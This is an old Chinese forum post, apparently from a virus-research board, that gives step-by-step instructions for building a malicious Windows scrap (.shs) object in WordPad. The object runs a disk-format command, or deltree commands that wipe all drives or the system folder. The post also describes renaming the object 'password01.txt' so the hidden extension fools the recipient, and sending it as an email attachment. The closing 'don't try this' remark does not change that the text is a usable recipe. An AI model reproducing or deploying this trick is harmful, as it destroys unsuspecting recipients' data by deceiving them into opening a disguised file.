[这个贴子最后由blackking在 2004/03/13 01:32am 第 1 次编辑]
作者:lp乌鸦 更新日期:2003-12-19 类别:网络安全->病毒研究
1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板文档}单栏中的“插入对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑包对象编辑包”(如图1)。在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑命令行”,然后输入如下命令:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。
5.选择菜单栏中的“编辑卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为”片段”),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述,“.shs”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(弹出dos运行窗口,执行格式化命令).如果将上面的命令替换为:start.exe /m deltree /y a:*.* c:*.* d:*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c:windowssystem*.* 则是删除对方c:windowssystem目录底下的所有文件.(当然大家可以改成其它的命令)
真的很简单,就这样一个恶意的攻击程序被弄出来了,太可怕了!
注意:千万不要尝试喔,否则文件丢失、电脑就无法启动了 |
